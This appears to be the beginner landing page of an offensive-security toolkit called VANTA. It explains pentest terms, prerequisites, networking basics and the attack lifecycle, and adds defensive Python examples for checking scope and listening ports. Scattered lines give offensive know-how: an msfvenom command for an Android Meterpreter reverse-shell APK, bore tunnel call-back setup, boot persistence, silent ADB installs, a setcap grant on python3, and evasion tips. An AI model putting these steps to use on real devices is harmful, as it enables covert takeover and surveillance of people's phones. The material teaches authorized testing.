Complete Beginner Start Here

Foundation: Before You Touch Anything

This page is the entry point for anyone new to offensive security, penetration testing, or the VANTA toolkit. Read it first. It covers every term you will encounter across all modules, how the terminal works, OSI model, DNS, HTTP, Android and WiFi security architecture, payloads, reverse shells, OWASP Top 10, home lab setup, CTF strategy, and your first operation in under 10 minutes. No prior experience required. 22 sections, zero assumptions.


00 Your Learning Path

Where To Start

01
Read This Page
Learn every term in the glossary. Understand what ADB, payload, Meterpreter, and bore mean before running anything.
02
Set Up Prerequisites
Install VANTA, Metasploit, ADB, apktool, and bore on your attack machine. Everything you need is listed below.
03
First Run — netrecon
Run a basic network scan against your own machine to confirm everything is installed correctly. No target device needed.
04
Pick a Module
Once comfortable with the basics, dive into a module. Each module page has a Beginner Startup section at the top.
Legal reminder: All VANTA modules are tools for authorized penetration testing, security research, and CTF competitions only. Running these tools against systems you do not own or have written permission to test is illegal in most jurisdictions. Always confirm your scope and obtain written authorization before testing.

01 Glossary

Every Term You Need to Know

Penetration Testing — Core Concepts
Penetration Test (Pentest)
An authorized simulated attack on a system to find real vulnerabilities before a real attacker does. A pentest has a defined scope, a start/end date, and written permission from the system owner.
Red Team / Blue Team
Red Team = attackers (you, running VANTA). Blue Team = defenders (the security operations center watching for intrusions). Red teams simulate real adversaries to stress-test blue team detection.
CTF (Capture The Flag)
A security competition where participants exploit intentionally vulnerable machines to find hidden "flags" (strings of text). Safe, legal, and a great way to practice. Platforms: TryHackMe, HackTheBox, PicoCTF.
Scope
The defined boundary of a pentest — which IP addresses, domains, and systems are in scope (allowed to test) vs out of scope (off limits). Never test outside scope.
Vulnerability
A weakness in a system that could be exploited — e.g. an unpatched software bug, a misconfiguration, or a default password. Having a vulnerability doesn't mean it's been exploited.
Exploit
Code or technique that takes advantage of a vulnerability to produce an unintended effect on the target system — gaining access, crashing it, or escalating privileges.
CVE (Common Vulnerabilities & Exposures)
A standardized identifier for a known vulnerability. Format: CVE-YEAR-NUMBER. Example: CVE-2023-45866 is the Bluetooth HID injection vulnerability patched in December 2023.
CVSS Score
A 0–10 severity score assigned to a CVE. 0–3.9 = Low, 4–6.9 = Medium, 7–8.9 = High, 9–10 = Critical. Higher = more dangerous and/or easier to exploit.
Zero-Click Exploit
An attack that requires zero user interaction on the target — no clicks, no taps, no downloads. The most dangerous class of exploit. Example: CVE-2023-45866 injects keystrokes over Bluetooth without pairing.
One-Click Exploit
An attack that requires one user action — e.g. tapping a download link, opening a document, or installing an app. Social engineering is usually involved.
Privilege Escalation (LPE / PE)
Going from a lower-privilege access (normal user) to a higher-privilege one (root / admin / system). LPE = Local Privilege Escalation (already on the machine). Common next step after initial access.
Attack Surface
All the ways an attacker can potentially reach and interact with a target — open ports, installed apps, Bluetooth, WiFi, USB ports, web APIs. Reducing attack surface = better security posture.
Shells, Payloads & Access
Shell
A command-line interface on a remote machine that gives you execution control — you type commands, they run on the target. The end goal of most exploits.
Reverse Shell
The target connects back to you (the attacker). Used when the target is behind a firewall/NAT. You listen on your machine; the payload on the target calls home. Most common shell type in VANTA.
Bind Shell
The target opens a port and waits for you to connect. Works when you can reach the target directly (same LAN). Less common — firewalls often block inbound.
Payload
The code delivered to the target that gives you access — the shell, the backdoor, the Meterpreter agent. Generated by msfvenom. Examples: android/meterpreter/reverse_https, linux/x64/shell_reverse_tcp.
Staged vs Stageless Payload
Staged: small first stage calls back to download the full payload. Smaller initial file but requires callback. Stageless: everything in one file, no callback. Use stageless (/ vs _ in msfvenom name) for reliability across firewalls.
Meterpreter
Metasploit's advanced in-memory shell. Runs entirely in RAM (no file written to disk), encrypted, and extensible. Provides file browsing, camera access, keylogging, screen capture, and post-exploitation modules. The default payload in VANTA's android module.
Handler / Listener
The Metasploit process on your machine that waits for the payload to call back. Run via msfconsole -q -r handler.rc. Must be running before (or as soon as) the payload executes on the target.
LHOST / LPORT
LHOST = your machine's IP address the payload calls back to. LPORT = the port number your handler listens on. These are baked into the payload at generation time. For WAN delivery, use the bore tunnel IP/port.
RHOST / RPORT
RHOST = target's IP address. RPORT = target's port you're connecting to. Used for network-side exploits where you connect to the target (rather than waiting for callback).
Persistence
Ensuring your access survives a reboot or session reset. Techniques: adding a startup service, modifying system files, injecting a BootReceiver into an app. Without persistence, losing the shell means starting over.
C2 (Command and Control)
The infrastructure used to communicate with compromised devices after gaining access — sending commands, receiving output, exfiltrating data. VANTA's C2 module uses bore WAN tunnels for callback over the internet.
Exfiltration
Extracting data from a compromised system — files, credentials, messages, contacts. The data moves from target to attacker. Common post-exploitation objective.
Android-Specific
ADB (Android Debug Bridge)
A command-line tool for communicating with Android devices from a computer. Enables installing apps, running shell commands, pulling files, and more. Requires USB debugging to be enabled on the device. Most VANTA operations use ADB.
APK (Android Package)
The installable app file format for Android, equivalent to a Windows .exe. Contains compiled Java bytecode (DEX), resources, and a manifest. VANTA generates malicious APKs with embedded payloads using msfvenom.
Root / Rooted Device
A device where the operating system's security restrictions have been removed, granting full administrator (root) access. Unlocks the ability to read/write any file on the device. Most powerful but voids warranty. Magisk is the common rooting tool.
Android Security Patch Level
A date string (e.g. 2023-12-01) that indicates the latest Google security update applied to the device. Any CVE published before that date should be patched. Check: adb shell getprop ro.build.version.security_patch.
Smali
Human-readable representation of Android's DEX bytecode — the closest thing to assembly for Android apps. apktool decompiles APKs into smali. VANTA injects BootReceiver.smali into APKs to add persistence.
BootReceiver
An Android component that runs automatically when the device boots. VANTA injects one into payload APKs so the Meterpreter shell reconnects every time the device restarts — no re-delivery needed.
Intent
Android's messaging system for starting activities, services, or broadcast receivers. am start -a android.intent.action.VIEW -d URL is how VANTA opens a download URL on the device via ADB.
pm (Package Manager)
Android CLI tool for installing, uninstalling, and querying apps. pm install -r -t /sdcard/Download/app.apk installs an APK from the device's storage without user confirmation when run via ADB.
Unknown Sources
Android setting that must be enabled (per-app since Android 8) to install APKs from outside the Play Store. VANTA requires this enabled for the browser to allow APK installs. Check: Settings → Apps → Special App Access → Install unknown apps.
Frida
A dynamic instrumentation toolkit — attaches to a running process and injects JavaScript to modify behavior, bypass checks, or extract data. VANTA uses Frida + Objection for SSL pinning bypass, root detection bypass, and runtime memory analysis.
SSL Pinning
An app-level defense where the app only trusts a specific certificate (not just any valid one). Prevents traffic interception with Burp Suite. VANTA's Frida/Objection module bypasses pinning on rooted devices automatically.
DEX (Dalvik Executable)
The compiled bytecode format that Android runs. Multiple DEX files can exist in one APK (classes.dex, classes2.dex). JADX decompiles DEX back to readable Java. VANTA's DexClassLoader staging downloads and runs a DEX file at runtime.
Networking & Tunnels
LAN vs WAN
LAN = Local Area Network — devices on the same network (your home WiFi, same router). WAN = Wide Area Network — the internet. A reverse shell callback must reach your machine across the WAN if the target is not on your LAN.
NAT (Network Address Translation)
Your router hides your private IP behind one public IP. Incoming connections from the internet can't reach your machine directly. WAN tunnels (bore) solve this — they punch through NAT without port forwarding.
bore Tunnel
A lightweight TCP tunnel tool used in VANTA to expose local ports to the internet without port forwarding. bore local 4444 --to bore.pub makes your local port 4444 reachable at bore.pub:RANDOM_PORT. Used for WAN MSF callbacks and APK delivery.
Port / Port Number
A number (0–65535) that identifies a specific process on a networked device. Port 4444 is the Metasploit handler default. Port 80 is HTTP, 443 is HTTPS. LPORT in VANTA = the port your handler listens on.
HTTP vs HTTPS
HTTP = unencrypted web traffic (port 80). HTTPS = encrypted (port 443, uses TLS). For reverse shells across the internet, reverse_https payloads blend in with normal HTTPS traffic and pass through firewalls more reliably than raw TCP.
IP Address
A number that identifies a device on a network. Private (LAN): 192.168.x.x, 10.x.x.x, 172.16–31.x.x. Public (WAN): the address internet traffic uses. LHOST in VANTA should be your LAN IP for local testing or bore's IP for WAN.
MAC Address
A hardware identifier burned into every network adapter — format: XX:XX:XX:XX:XX:XX. Unique per device. VANTA's mac_spoof module randomizes or sets it to avoid device fingerprinting on networks.
L2CAP (Bluetooth)
Logical Link Control and Adaptation Protocol — Bluetooth's layer-2 protocol, analogous to TCP/IP but for Bluetooth. CVE-2023-45866 exploits raw L2CAP sockets connecting to Android's HID channels (PSM 0x11, 0x13) without authentication.
Tools Used by VANTA
Metasploit Framework (MSF)
The industry-standard exploitation framework. Contains hundreds of exploits, payloads, and post-exploitation modules. VANTA uses msfvenom to generate payloads and msfconsole to run the listener/handler.
msfvenom
Metasploit's payload generator. Creates APKs, EXEs, scripts, and raw shellcode with your chosen payload/LHOST/LPORT embedded. Example: msfvenom -p android/meterpreter/reverse_https LHOST=x.x.x.x LPORT=4444 -o payload.apk.
msfconsole
The interactive Metasploit shell. Runs handlers, exploits, and post-exploitation modules. VANTA generates a handler.rc resource script — run it with msfconsole -q -r handler.rc to start the listener automatically.
apktool
Decompiles APKs into smali code + resources, lets you modify them, then rebuilds. VANTA uses it to inject BootReceiver.smali and patch AndroidManifest.xml for persistence. Command: apktool d app.apk -o decoded/.
JADX
Decompiles DEX/APK bytecode into readable Java source code. Used in VANTA's static analysis operations to find hardcoded secrets, API keys, and vulnerable code patterns without running the app.
Frida
Dynamic instrumentation — injects JavaScript into running processes. Requires frida-server running on the Android device (push via ADB). VANTA uses it to bypass SSL pinning, root detection, and extract runtime secrets.
Objection
A mobile pentest toolkit built on Frida. Provides one-command bypasses for common Android/iOS defenses: android sslpinning disable, android root disable, memory dumps. VANTA wraps it in the objection_explore operation.
nmap
Network scanner — discovers live hosts, open ports, running services, and OS versions on a network. The backbone of VANTA's netrecon module. Most basic use: nmap -sV 192.168.1.0/24.
scrcpy
Screen mirror an Android device to your desktop via ADB. VANTA uses it in the screen_mirror operation for live visual access during a session.
apksigner
Signs APKs with a keystore (certificate). Android requires all APKs to be signed before installation. VANTA auto-generates a debug keystore (vanta_debug.keystore) for signing modified APKs after apktool patching.
VANTA Framework — Internal Terms
Module
A self-contained Python tool in VANTA. Each module has a name (e.g. android_pentest), a set of operations, and a JSON I/O protocol. Run from the VANTA shell: use android_pentest.
Operation
A specific action within a module, set via the operation parameter. Example: set operation recon runs device reconnaissance; set operation backdoor_apk injects a payload into an APK.
Params / Parameters
Input values for an operation: target device, IP address, port number, file paths, etc. Set in the VANTA shell with set param_name value before running. Listed per-operation in each module's documentation.
Findings
Structured JSON output from a module run — vulnerabilities found, files created, URLs generated, status codes. Printed as RESULT {...} to stdout. The VANTA shell parses these into the session.
Work Directory
Auto-created per-session folder at ~/.vanta/<module>/<device>/<timestamp>/. Contains all generated files: APKs, handler.rc, bore logs, decoded app sources. Browse it in the GUI's Files tab.
handler.rc
A Metasploit resource script auto-generated by VANTA. Contains the exact use / set PAYLOAD / set LHOST / exploit -j commands. Run it: msfconsole -q -r ~/.vanta/.../handler.rc.
GUI Mode
Run a module with mode=gui to launch a web-based control panel at http://localhost:PORT. The GUI provides form inputs for every operation, a live log stream, a file browser, and (for android_pentest) a C2 dashboard.
Bore WAN Tunnel
VANTA automatically opens a bore tunnel for every WAN-facing operation. The tunnel maps bore.pub:RANDOM_PORT → localhost:LPORT. The bore public URL is embedded in the payload at generation time so callbacks work across the internet.

02 Prerequisites

What You Need Installed

VANTA Core
  • git clone https://github.com/0xb0rn3/vanta
  • cd vanta && bash install.sh — installs all deps
  • Go 1.21+ for the shell binary
  • Python 3.10+ for all modules
  • Verify: ./vanta help
Android Testing
  • android-tools — ADB + fastboot: pacman -S android-tools
  • apktool: yay -S android-apktool-bin
  • metasploit: yay -S metasploit
  • bore: see rqm.md manual install
  • On device: Enable USB Debugging in Developer Options
  • On device: Enable Install Unknown Apps for your browser
Network Testing
  • nmap: pacman -S nmap nmap-ncat
  • masscan (optional): yay -S masscan
  • rustscan (optional): yay -S rustscan
  • Run scans as root for SYN scanning: sudo nmap
Bluetooth Testing
  • bluez + bluez-utils: pacman -S bluez bluez-utils
  • Start service: systemctl enable --now bluetooth
  • Unblock: rfkill unblock bluetooth
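  • CAP_NET_RAW for BT sockets: sudo setcap cap_net_raw+eip "$(readlink -f "$(which python3)")" (setcap must target the real binary, not a symlink; the capability then applies to every script run with that interpreter)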
  • Physical Bluetooth adapter required (built-in or USB dongle)
Arch Linux / ChaOS / CachyOS: All VANTA dependencies are available via pacman (official repos) or yay (AUR). The install.sh script detects your distro and installs the right packages. For Debian/Ubuntu/Kali, equivalent apt packages are listed in tools/mobile/android/rqm.md.

03 First Run

Your First 10 Minutes


04 Module Index

All Modules — Difficulty & First Step

Module | Category | Difficulty | What it does | Your first operation
netrecon | Network · Recon | Beginner | Scan a network for open ports, services, CVEs, and IoT devices using nmap/masscan/rustscan. | set target 127.0.0.1 → run — scans your own machine
android_pentest | Mobile · Android | Intermediate | Full Android pentest suite — recon, payload delivery, C2, Frida instrumentation, screen mirror, audio capture. | set operation recon → run — read-only device info gathering
websec | Web · Application | Beginner | Web application security scanning — SQLi, XSS, directory brute force, header analysis, auth bypass. | set target http://testphp.vulnweb.com → run
wifi_monitor | WiFi · Network | Intermediate | WiFi monitoring, WPA handshake capture, deauth attacks, beacon flood, evil twin setup. Requires a WiFi adapter that supports monitor mode. | set operation scan → run
ios_pentest | Mobile · iOS | Advanced | iOS app analysis, Frida hooks, plist extraction, keychain dumping. Requires jailbroken device or developer cert. | Connect jailbroken iPhone via USB. set operation recon → run
windowsAD | Windows · Active Directory | Advanced | AD enumeration, Kerberoasting, AS-REP roasting, pass-the-hash, DCSync, BloodHound integration. Requires an AD domain. | set operation enum → run
adsec | Active Directory · Offense | Advanced | Advanced AD attack chains — Golden/Silver ticket, DCSYNC, lateral movement, persistence. | Use after windowsAD enumeration provides domain context.
iot_pwn | IoT · Embedded | Intermediate | IoT device exploitation — firmware analysis, default credential testing, MQTT/Modbus/RTSP attacks. | set operation scan → run — discovers IoT on local network
mac_spoof | Network · Identity | Beginner | Randomize or set your network adapter's MAC address to avoid fingerprinting on target networks. | set interface eth0 → set mode random → run
ctfpwn | CTF · Binary | Intermediate | CTF-focused: binary exploitation, ROP chain building, format string, heap challenges. Integrates with pwntools. | Download a CTF binary, set binary ./chall → set operation analyze → run

05 Networking Fundamentals

How Computers Communicate

Every VANTA module — netrecon, android_pentest, websec, wifi_monitor — touches network protocols. You don't need to memorize every RFC, but you need to understand IP addresses, ports, and packets well enough to read scan output and understand what's happening when an attack fires.

IP Addresses — What They Are at the Byte Level

IPv4 Address
An IPv4 address is exactly 4 bytes (32 bits), written as four decimal numbers 0–255 separated by dots. Each number is one byte.
192.168.1.100
 ↑   ↑   ↑  ↑
 │   │   │  └─ 4th byte = 0x64 = 100
 │   │   └──── 3rd byte = 0x01 = 1
 │   └──────── 2nd byte = 0xA8 = 168
 └──────────── 1st byte = 0xC0 = 192

On the wire: C0 A8 01 64  (4 raw bytes in IP header)
Special Addresses
  • 127.0.0.1 (loopback) — your own machine. Traffic never leaves the NIC.
  • 192.168.x.x (private LAN) — home/office network. Not routable on the internet.
  • 10.x.x.x — another private range. VMs often use 10.0.2.x
  • 172.16–31.x.x — third private range. Docker uses 172.17.0.x
  • 255.255.255.255 (broadcast) — every device on the subnet receives it
  • 0.0.0.0 (any/all interfaces) — used in server binds (listen on all NICs)
Subnet / CIDR
A subnet is a range of IP addresses sharing the same network. CIDR notation: 192.168.1.0/24

The /24 means the first 24 bits (3 bytes) are the network = 192.168.1.
The last 8 bits are host addresses → 256 possible addresses → 254 usable (0=network, 255=broadcast)

/16 = 65,534 hosts  |  /24 = 254 hosts  |  /30 = 2 hosts
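
The subnet arithmetic above, combined with the scope rule from the glossary, as an added Python example (not part of VANTA): it derives the network facts for a CIDR block and refuses any target outside the authorized ranges. The IN_SCOPE and OUT_OF_SCOPE lists and both function names are constructed for illustration.

```python
import ipaddress

# Constructed engagement scope for illustration; use the ranges from your
# written authorization instead.
IN_SCOPE = ["192.168.56.0/24", "10.10.0.0/16"]
OUT_OF_SCOPE = ["192.168.56.1/32", "10.10.200.0/30"]  # exclusions always win


def describe_network(cidr: str) -> dict:
    """Derive the facts the section works out by hand for one CIDR block."""
    # strict=True rejects input such as 192.168.1.100/24 (host bits set),
    # a common typo when copying ranges out of a scope document.
    net = ipaddress.ip_network(cidr, strict=True)
    if net.version != 4:
        raise ValueError("this example covers IPv4 only")
    host_bits = 32 - net.prefixlen
    mask = (0xFFFFFFFF << host_bits) & 0xFFFFFFFF
    total = 1 << host_bits
    # Network and broadcast addresses are not assignable, except in /31 and
    # /32 blocks, which have no separate network/broadcast address.
    usable = total - 2 if net.prefixlen <= 30 else total
    return {
        "network": str(net.network_address),
        "broadcast": str(net.broadcast_address),
        "netmask": str(ipaddress.IPv4Address(mask)),
        "wire_bytes": net.network_address.packed.hex(" ").upper(),
        "usable_hosts": usable,
    }


def check_target(target: str) -> tuple[bool, str]:
    """Return (allowed, reason) for one target before anything is scanned."""
    try:
        addr = ipaddress.ip_address(target)
    except ValueError:
        return False, "not a literal IP address; resolve it and check the result"
    if addr.is_loopback:
        return True, "loopback: your own machine"
    for cidr in OUT_OF_SCOPE:
        if addr in ipaddress.ip_network(cidr):
            return False, f"explicitly excluded by {cidr}"
    for cidr in IN_SCOPE:
        if addr in ipaddress.ip_network(cidr):
            return True, f"inside authorized range {cidr}"
    kind = "private" if addr.is_private else "public"
    return False, f"{kind} address outside every authorized range"


if __name__ == "__main__":
    print(describe_network("192.168.1.0/24"))
    for ip in ("192.168.56.20", "192.168.56.1", "10.10.200.2", "8.8.8.8"):
        print(ip, check_target(ip))
```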

Ports — What They Are and Why They Matter

A port is a 16-bit number (0–65535) that identifies which application on a machine should receive incoming traffic. When your browser connects to a website, it connects to port 443 (HTTPS). Your mail client connects to port 993 (IMAPS). Ports let one machine run dozens of services simultaneously — the OS routes each incoming connection to the correct application based on the port number.
Port 22 — SSH
Secure Shell — encrypted remote terminal. If open on a server, attackers try credential brute force or stolen keys. ssh user@192.168.1.10
Port 80 — HTTP
Plain-text web traffic. All data visible on the wire — credentials, cookies, content. netrecon flags open HTTP on internal servers as a finding.
Port 443 — HTTPS
HTTP inside TLS encryption. Meterpreter uses this port for its C2 tunnel — traffic looks identical to normal web browsing to a firewall.
Port 445 — SMB
Windows file sharing. Used for lateral movement in Windows networks (PsExec, WMI). EternalBlue (WannaCry) ran on this port. Always flag this on internet-facing systems.
Port 3389 — RDP
Windows Remote Desktop. A very common entry point — organizations leave it internet-exposed, attackers brute force or use stolen credentials.
Port 5555 — ADB
Android Debug Bridge over TCP. If an Android device has this port open on the network, anyone can run ADB commands on it without authentication. netrecon's android preset specifically looks for this.
Port 1883 — MQTT
IoT messaging protocol. Smart home devices, sensors, and industrial equipment often use MQTT with no authentication. iot_pwn scans for open MQTT brokers.
Port 4444
Default Metasploit/Meterpreter handler port. Not a standard service — it's just conventional. VANTA uses it by default for LPORT. Change it to 443 or 8443 for better evasion.
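
A defender's view of the same port list, as an added Python example (not VANTA code): it reads ss -tulpn output and reports the ports described above when they listen on a non-loopback address. The sample output, the FLAGGED table, and the function names are constructed for illustration.

```python
import ipaddress
import re

# Ports from the list above, with the reason each deserves a look when it is
# reachable from the network. The selection is this example's, not VANTA's.
FLAGGED = {
    80: "HTTP: plain-text web traffic",
    445: "SMB: Windows file sharing",
    1883: "MQTT: often deployed with no authentication",
    3389: "RDP: common brute-force entry point",
    4444: "conventional Metasploit handler port, unexpected on a normal host",
    5555: "ADB over TCP",
}

# Constructed sample of `ss -tulpn` output (process names need root).
SAMPLE_SS = """\
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
tcp   LISTEN 0      128          0.0.0.0:22        0.0.0.0:*     users:(("sshd",pid=812,fd=3))
tcp   LISTEN 0      4096       127.0.0.1:1883      0.0.0.0:*     users:(("mosquitto",pid=901,fd=5))
tcp   LISTEN 0      5            0.0.0.0:5555      0.0.0.0:*     users:(("adbd",pid=1330,fd=9))
tcp   LISTEN 0      511             [::]:80           [::]:*     users:(("nginx",pid=640,fd=7))
tcp   LISTEN 0      1                  *:4444            *:*     users:(("ruby",pid=2210,fd=11))
udp   UNCONN 0      0       192.168.1.50:68        0.0.0.0:*     users:(("dhclient",pid=500,fd=6))
"""

PROC_RE = re.compile(r'\(\("([^"]+)"')


def split_endpoint(endpoint: str) -> tuple[str, str]:
    """Split 'host:port', coping with [::]:80, *:4444 and addr%iface forms."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]").split("%")[0], port


def exposure(host: str) -> str:
    """Classify how widely a listening socket is reachable."""
    if host == "*":
        return "all interfaces"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "unknown"
    if addr.is_loopback:
        return "loopback"
    return "all interfaces" if addr.is_unspecified else "single interface"


def audit_listeners(ss_output: str) -> list[dict]:
    """Return one finding per flagged port that is not bound to loopback."""
    findings = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] not in ("tcp", "udp"):
            continue  # header or unrelated line
        host, port = split_endpoint(fields[4])
        if not port.isdigit():
            continue
        reason = FLAGGED.get(int(port))
        bound_to = exposure(host)
        if reason is None or bound_to == "loopback":
            continue
        proc = PROC_RE.search(line)
        findings.append({
            "proto": fields[0],
            "port": int(port),
            "bound_to": bound_to,
            "process": proc.group(1) if proc else "?",
            "why": reason,
        })
    return sorted(findings, key=lambda f: f["port"])


if __name__ == "__main__":
    for finding in audit_listeners(SAMPLE_SS):
        print(finding)
```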

What is a Packet?

When two computers communicate, they don't send one giant stream of data — they break it into packets. Each packet has a header (routing information) and a payload (the actual data). Routers read headers to forward packets; firewalls and IDS inspect headers and payloads to decide whether to allow or block traffic.
┌────────────────────────────────────────────────────────────────┐
│  Ethernet Frame (Layer 2)                                      │
│  ┌──────────────────────────────────────────────────────────┐  │
│  │  IP Packet (Layer 3)                                     │  │
│  │  ┌────────────────────────────────────────────────────┐  │  │
│  │  │  TCP Segment (Layer 4)                             │  │  │
│  │  │  ┌──────────────────────────────────────────────┐  │  │  │
│  │  │  │  Application Data (Layer 7)                  │  │  │  │
│  │  │  │  e.g. "GET / HTTP/1.1\r\nHost: site.com\r\n" │  │  │  │
│  │  │  └──────────────────────────────────────────────┘  │  │  │
│  │  │  src_port: 52341   dst_port: 443                    │  │  │
│  │  │  seq: 0x11223344   ack: 0x44332211                  │  │  │
│  │  └────────────────────────────────────────────────────┘  │  │
│  │  src_ip: 192.168.1.50   dst_ip: 93.184.216.34           │  │
│  │  ttl: 64   protocol: 6 (TCP)                            │  │
│  └──────────────────────────────────────────────────────────┘  │
│  src_mac: aa:bb:cc:dd:ee:ff   dst_mac: 00:11:22:33:44:55      │
└────────────────────────────────────────────────────────────────┘
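
A parser for the nested headers in the diagram, as an added Python example (not VANTA code). It builds one constructed frame with the diagram's addresses, ports, and sequence numbers, then unwraps Ethernet, IPv4, and TCP in turn, honouring the variable header lengths and verifying the IPv4 header checksum. Function names are this example's; the TCP checksum is left at zero and not validated.

```python
import socket
import struct


def ipv4_checksum(header: bytes) -> int:
    """RFC 1071 one's-complement checksum over an IPv4 header."""
    total = sum(struct.unpack(f"!{len(header) // 2}H", header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_sample_frame() -> bytes:
    """Constructed frame carrying the values shown in the diagram."""
    data = b"GET / HTTP/1.1\r\nHost: site.com\r\n\r\n"
    tcp = struct.pack("!HHIIBBHHH", 52341, 443, 0x11223344, 0x44332211,
                      5 << 4,   # data offset: 5 words = 20 bytes, no options
                      0x18,     # flags: PSH + ACK
                      64240, 0, 0) + data  # window, checksum (unset), urgent
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0x1234, 0x4000,
                     64, 6, 0,  # ttl, protocol 6 = TCP, checksum placeholder
                     socket.inet_aton("192.168.1.50"),
                     socket.inet_aton("93.184.216.34"))
    ip = ip[:10] + struct.pack("!H", ipv4_checksum(ip)) + ip[12:]
    # Ethernet puts the destination MAC first, then the source MAC.
    eth = bytes.fromhex("001122334455aabbccddeeff") + struct.pack("!H", 0x0800)
    return eth + ip + tcp


def parse_frame(frame: bytes) -> dict:
    """Unwrap Ethernet -> IPv4 -> TCP; raise ValueError on anything malformed."""
    if len(frame) < 14:
        raise ValueError("truncated Ethernet header")
    dst_mac, src_mac, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != 0x0800:
        raise ValueError("not an IPv4 frame")

    ip = frame[14:]
    if len(ip) < 20:
        raise ValueError("truncated IPv4 header")
    ver_ihl, _tos, total_len, _id, _frag, ttl, proto, _csum, src, dst = \
        struct.unpack("!BBHHHBBH4s4s", ip[:20])
    ihl = (ver_ihl & 0x0F) * 4          # header bytes; more than 20 means options
    if ver_ihl >> 4 != 4 or ihl < 20 or not ihl <= total_len <= len(ip):
        raise ValueError("inconsistent IPv4 lengths")
    if ipv4_checksum(ip[:ihl]) != 0:    # a valid header checks to zero
        raise ValueError("bad IPv4 header checksum")
    if proto != 6:
        raise ValueError("not TCP")

    tcp = ip[ihl:total_len]             # total_len trims any Ethernet padding
    if len(tcp) < 20:
        raise ValueError("truncated TCP header")
    sport, dport, seq, ack, offset, flags = struct.unpack("!HHIIBB", tcp[:14])
    data_off = (offset >> 4) * 4        # TCP header bytes including options
    if not 20 <= data_off <= len(tcp):
        raise ValueError("inconsistent TCP data offset")
    names = ((0x02, "SYN"), (0x10, "ACK"), (0x08, "PSH"), (0x01, "FIN"), (0x04, "RST"))
    return {
        "src_mac": src_mac.hex(":"), "dst_mac": dst_mac.hex(":"),
        "src_ip": socket.inet_ntoa(src), "dst_ip": socket.inet_ntoa(dst),
        "ttl": ttl, "src_port": sport, "dst_port": dport,
        "seq": seq, "ack": ack,
        "flags": [name for bit, name in names if flags & bit],
        "data": tcp[data_off:],
    }


if __name__ == "__main__":
    for key, value in parse_frame(build_sample_frame()).items():
        print(f"{key:8} {value}")
```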

TCP vs UDP — Two Ways to Send Data

TCP — Reliable
  • Connection-oriented — 3-way handshake before data flows (SYN → SYN-ACK → ACK)
  • Guaranteed delivery — lost packets are automatically re-sent
  • In-order — packets re-assembled in correct sequence
  • Used by: HTTP/HTTPS, SSH, SMB, Meterpreter, ADB, most attack tools
  • nmap SYN scan (-sS) sends a SYN, waits for SYN-ACK to confirm port open
UDP — Fast
  • Connectionless — no handshake, just send and hope it arrives
  • No delivery guarantee — lost packets are gone
  • Used by: DNS (port 53), DHCP, SNMP, MQTT, NTP, streaming
  • nmap UDP scan (-sU) is slow — closed ports send ICMP port unreachable; open ports often say nothing
  • DNS is a common lateral movement vector — DNS queries bypass many firewalls

06 The Attack Lifecycle

How Attacks Actually Work

Real attacks follow a pattern. Lockheed Martin's Cyber Kill Chain and MITRE's ATT&CK framework document these stages. Understanding the lifecycle tells you which VANTA module applies at each phase.

01
Reconnaissance
Gather intelligence about the target — IP ranges, open ports, services, employees, technologies, and potential vulnerabilities. All passive or lightly active, before any exploitation.
VANTA module: netrecon
02
Weaponization
Build or customize the attack tool — create a malicious APK, generate a payload, prepare DuckyScript, craft a SQL injection string. The weapon is ready but not yet deployed.
VANTA modules: android_pentest, revshell, badusb
03
Delivery
Get the weapon to the target — send a phishing link, plug in a USB device, push the APK via ADB/QR/Bluetooth, send a crafted HTTP request. Delivery is where social engineering often plays a role.
VANTA modules: badusb, android_pentest (bt_zero_deliver)
04
Exploitation
The weapon triggers — the vulnerability is exploited. An installed APK launches Meterpreter. A SQL injection extracts the database. A buffer overflow spawns a shell. Exploitation is the moment of initial access.
VANTA modules: android_pentest, websec, windowsAD
05
Installation
Establish persistence — install a backdoor, register a BootReceiver, create a scheduled task, add a registry key — so access survives reboots, logouts, and password changes.
VANTA modules: android_pentest (boot_persist), windowsAD (persist)
06
Command & Control (C2)
The compromised system connects back to the attacker — a Meterpreter session, a reverse shell, a Sliver agent. The attacker now has an interactive channel to issue commands and receive output.
VANTA modules: revshell, android_pentest (c2_gui), windowsAD (sliver)
07
Actions on Objectives
Execute the actual goal — dump credentials, exfiltrate files, move laterally to other systems, escalate privileges, access the final target. In a pentest, this phase produces the evidence for the report.
VANTA modules: windowsAD (loot, secrets), android_pentest (file_manager, process_inject), websec (sqli data extraction)
MITRE ATT&CK: A comprehensive framework cataloguing every known attacker technique by tactic and platform. Free at attack.mitre.org. When VANTA finds a vulnerability, cross-referencing ATT&CK gives you the exact technique ID to include in your pentest report — e.g. T1190 (Exploit Public-Facing Application) or T1059.001 (PowerShell).

07 Linux Survival Guide

Linux Commands You Must Know

VANTA runs on Linux (Kali, Arch, Ubuntu). Every module uses the terminal. You don't need to be a Linux expert, but you need to be comfortable with the commands below — they appear in module outputs, dependency installation, and troubleshooting.

File System Navigation

pwd                   # Print Working Directory — where you are right now
ls -la                # List files including hidden (.) files + permissions
ls -lh /path          # Human-readable sizes (KB, MB, GB)
cd /home/user/VANTA    # Change directory (absolute path)
cd ..                 # Go up one directory
cd ~                  # Go to your home directory (/home/username)
mkdir -p a/b/c        # Create nested directories (no error if exists)
rm -rf dir/           # Delete directory and all contents (irreversible — be careful)
cp -r src/ dst/       # Copy directory recursively
mv old.txt new.txt    # Move/rename a file
find . -name "*.py"   # Find files matching pattern in current directory
which nmap            # Show full path of a command (/usr/bin/nmap)

Reading and Writing Files

cat file.txt           # Print entire file to terminal
less file.txt          # Scrollable file viewer (q to quit)
head -n 20 file.txt    # First 20 lines
tail -f /var/log/syslog # Follow file as it grows (live logs)
grep "error" file.txt  # Find lines containing "error"
grep -r "password" .   # Recursively grep entire directory
grep -i "ERROR" *.log  # Case-insensitive grep
echo "text" > file.txt # Write text to file (overwrites)
echo "text" >> file.txt # Append text to file
nano file.txt          # Simple text editor (Ctrl+O to save, Ctrl+X to exit)

Networking Commands (Essential for Pentesting)

ip a                   # Show all network interfaces + IP addresses
ip route               # Show routing table (default gateway)
hostname -I            # Print your IP(s) — quick way to find your LHOST
ss -tulpn              # Show all listening ports + which process
netstat -tulpn         # Alternative to ss (older systems)
